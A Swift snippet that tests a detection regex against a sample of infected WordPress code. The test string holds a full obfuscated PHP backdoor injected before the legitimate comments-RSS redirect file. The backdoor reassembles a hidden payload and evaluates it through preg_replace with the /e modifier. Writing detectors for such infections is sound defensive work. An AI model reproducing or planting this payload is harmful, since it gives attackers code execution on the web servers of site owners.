import Foundation
let pattern = #"<\?php \$guobywgpku.*\?>"#
let regex = try! NSRegularExpression(pattern: pattern, options: .anchorsMatchLines)
let testString = ###"""
<?php $guobywgpku = 'FI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj%x78256<pd%x5c%x7825827;!>>>!}_;gvc%x5c%x7825}&;f5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c5c%x7860QIQ&f_UTPI%x5c%x7idk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftjs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI##-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7823e]81]K78:56985:6197}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5%x5c%x7825%x5c%x7827Y%x5c%x78256<.msx72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $Gw6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x25tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#TP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%782fh%x5c%x7825:<**#57]38y]47]67y]3y72]254]y76]61]y33]68]y34]68]y33]65]&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]57>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}b:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj%x787f!>>%x5c%x7822!pd%x5c%x7372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]15tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x782%x5c%x7825)tpqsut>j%]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x60{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x787f%x5c%x787f%x5c%x787f<u%x5c%x78257860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x78211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsf]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}%x7824-%x5c%x7824y4%xx7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%xf%155%x61%160%x28%42%x66%152%x66860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7824*<!%x5c%x7824-%x5c%2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7x5c%x7824-%x5c%x7824b!>!%x5c%c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{lace("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%x28x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b5kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%xb%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x784:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#V%x5c%x7827{ftmfV%x5c%x787f<*X&Zx5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fx5c%x7825+*!*+fepdfe{h+{d%x5c%x78x7825yy)#}#-#%x5c%x7824-%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qgj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%7825ww2)%x5c%x7825w%x5c%q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%xf]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-tr.98v%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c8256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)x7825o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%xc2^-%x5c%x7825hOh%x5c%x782f#00#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%xq%x5c%x7825>U<#16,47R57,27x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860o5c%x7825=*h%x5c%x7825)m%x5c%x7SVD!-id%x5c%x7825)uqpuft%x5c%x7865c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6g%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x75!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)idsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x78256<%x5c%x787fw6*%x5c%x787f_*#fmj8y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m8]y6g]273]y76]271]y7d]252]y%x787fw6*3qj%x5c%x782uvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zb:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%4<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]2737>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUU5%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#op25<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%%x5c%x7825)sf%x5c%x78x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827j%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785o#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldf5!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x6<%x5c%x787fw6*%x5c%x787f_*#ujoj%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%xhopmA%x5c%x78273qj%x5c%x7825ji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fuj:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:x5c%x7824y7%x5c%x7824-%x5c%xx5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5cx5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5cx78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x78%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fm%x7827,*e%x5c%x7827,*d%x5c%1]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%LOBALS["%x61%156%x75%156%x61"]=1; function fjfgsutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7826<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x782565c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c5c%x7824-%x5c%x7824]y8%xK;%x5c%x7860ufldpt}X;%x5c%x7860msvd}*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x6]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", NULL)gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x785c%x782fh%x5c%x7825)n%x5c%x7825-#+I#).}-}!#*<%x5c%x7825nfd>%x5c!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)npdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825sv%x5c%x78256<C>^#zsfv]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85tmbg}%x5c%x787f;!osvufs}w;*%x5cr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7fepmqyf%x5c%x7827*&7-n%x5c%x7825)utpjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!5fdy)##-!#~<%x5c%x7825c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|6[%x5c%x7825ww2!>#p#%x5c%x782f341]88M4P8]37]278]225]2412!>!bssbz)%x5c%x7824]25%x5c%x7824-%%x7860GB)fubfsdXA%x5c%x7827K6<%x5cg:74985-rr.93e:5597f-s.973:82x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x78255)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x782x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78jm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x784-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x782%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**5c%x7825ggg!>!#]y81]273]y76]25]256]y6g]257]y86]267]y74>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c4%x5c%x782f%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{hx7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#]62]y4c#<!%x5c%x7825t::!>!%x5c~<**9.-j%x5c%x7825-bubE{h%x5c%xE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x782824*<!~!dsfbuf%x5c%x7860gvoduj85:52985-t.98]K4]65]D8]86]y31]278]y37825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)72p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%I7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x782x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%if((function_exists("%x6f%142%x5f%163%x74%141%7d]252]y74]256#<!%x5c%x7825ff]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]2fs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%xc%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78257825mm!>!#]y81]273]y76]258]y6g]273]y76]271]y782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq97f:5297e:56-%x5c%x7878r.90msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7y83]256]y78]248]y83]256]y81]265]25)+opjudovg+)!gj+{e%x5c%x7825!osvubc%x5c%x787f!|!*uyfu%x%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x77878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsg($n){return chr(ord($n)-1);} @error_reporting(0); preg_rep5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFTy31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y77]88y]27]28y]#%x5c%x782fr%x5c%x7825%xx7827,*c%x5c%x7827,*b%x5c%x7827)x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%5c%x7860cpV%x5c%x787f%x5c%&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x7824-!%x5c%x7825%x5c%x7824-%xx78b%x5c%x7825w:!>!%5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%xx5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gjx5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,25z>3<!fmtf!%x5c%x7825z>2<!%x5c%xgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y8>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x782]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5fepdof.)fepdof.%x5c%x782f#@#%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]ubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5cR;*msv%x5c%x7825)}.;%x5c%x7860UQPM78pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjx7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c; }hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!/(.*)/epreg_replaceemueawwfnp'; $qexdgqhlqm = explode(chr((137-93)),'7756,46,510,62,5237,47,8632,59,2088,54,6772,55,1784,32,3581,45,4075,63,4138,56,9088,20,4854,67,101,20,572,47,9108,53,3441,48,2956,61,5961,35,6588,53,5064,56,4680,48,306,38,3926,47,7534,52,8856,58,10001,60,6221,34,3733,21,967,61,4652,28,5323,50,4976,51,4215,45,5807,22,5909,52,8191,39,474,36,2807,59,9812,59,4921,55,3626,35,9416,57,1742,42,7405,43,0,38,7993,54,4568,32,7448,42,5579,57,1447,41,4330,44,5434,36,9918,34,3352,33,8256,42,121,29,5878,31,1256,29,3280,42,5996,54,7249,31,1127,68,7031,51,1391,20,9267,67,7280,59,6505,47,3489,47,1195,61,5699,48,5284,39,4534,34,2025,63,10064,42,2530,38,7490,44,9229,38,8451,66,9161,68,150,69,5120,27,8824,32,9682,34,8091,51,2142,56,4194,21,9952,49,3536,45,8587,45,2866,35,2568,65,5470,60,219,25,1816,68,1525,60,3973,61,4471,63,244,62,8365,22,8691,51,8987,67,3239,41,1028,45,838,60,9523,62,5747,60,709,58,2421,33,8330,35,7889,59,8914,26,1488,37,2345,32,8940,47,2377,44,3213,26,5027,37,4034,41,3166,47,8517,70,38,63,431,43,1990,35,3106,60,7586,64,3867,59,9767,45,9473,50,5147,48,5829,49,6920,24,2901,55,8387,64,767,35,8787,37,5636,37,2714,45,3322,30,7152,67,1285,52,3661,45,4260,70,3017,58,8047,44,7802,29,6186,35,9054,34,5373,37,2633,57,1961,29,2454,29,7650,51,6944,37,1721,21,5410,24,6071,60,5195,42,4768,28,1884,23,7082,70,7339,30,9585,40,6694,41,6337,61,7219,30,4600,52,9716,51,6284,53,1646,42,3754,69,9334,49,1907,54,4432,39,3075,31,6827,63,6398,68,411,20,6255,29,8230,26,7369,36,2759,48,2277,68,1411,36,3385,56,659,50,4374,58,1688,33,5673,26,6735,37,1337,54,6050,21,7001,30,6161,25,7831,58,1585,61,9625,57,7948,45,9871,47,7701,55,4796,58,6466,39,4728,40,8142,49,3823,44,2483,47,1073,54,6131,30,6641,53,9383,33,2690,24,6552,36,2232,45,619,40,344,67,6981,20,2198,34,6890,30,3706,27,898,69,8298,32,802,36,8742,45,5530,49,10061,3'); $gnjrdqiale=substr($guobywgpku,(63431-53325),(38-31)); if (!function_exists('rouxoxqqcn')) { function rouxoxqqcn($jkchvpkoly, $ukyrpbbpno) { $npouerjovm = NULL; for($ncuopzikpm=0;$ncuopzikpm<(sizeof($jkchvpkoly)/2);$ncuopzikpm++) { $npouerjovm .= substr($ukyrpbbpno, $jkchvpkoly[($ncuopzikpm*2)],$jkchvpkoly[($ncuopzikpm*2)+1]); } return $npouerjovm; };} $khztaaahah="\x20\57\x2a\40\x73\144\x6f\154\x75\167\x70\156\x64\157\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x33\55\x31\71\x36\51\x29\54\x20\143\x68\162\x28\50\x33\71\x34\55\x33\60\x32\51\x29\54\x20\162\x6f\165\x78\157\x78\161\x71\143\x6e\50\x24\161\x65\170\x64\147\x71\150\x6c\161\x6d\54\x24\147\x75\157\x62\171\x77\147\x70\153\x75\51\x29\51\x3b\40\x2f\52\x20\151\x7a\142\x6c\156\x6e\161\x68\145\x61\40\x2a\57\x20"; $bhpegpvvmc=substr($guobywgpku,(55301-45188),(44-32)); $bhpegpvvmc($gnjrdqiale, $khztaaahah, NULL); $bhpegpvvmc=$khztaaahah; $bhpegpvvmc=(763-642); $guobywgpku=$bhpegpvvmc-1; ?><?php
/**
* Redirects to the Comments RSS2 feed
* This file is deprecated and only exists for backwards compatibility
*
* @package WordPress
*/
require( './wp-load.php' );
wp_redirect( get_bloginfo( 'comments_rss2_url' ), 301 );
exit;
?>
"""###
let stringRange = NSRange(location: 0, length: testString.utf16.count)
if let firstMatch = regex.firstMatch(in: testString, range: stringRange) {
let result: [String] = (1 ..< firstMatch.numberOfRanges).map { (testString as NSString).substring(with: firstMatch.range(at: $0)) }
print(result)
} else {
print("No matches were found.")
}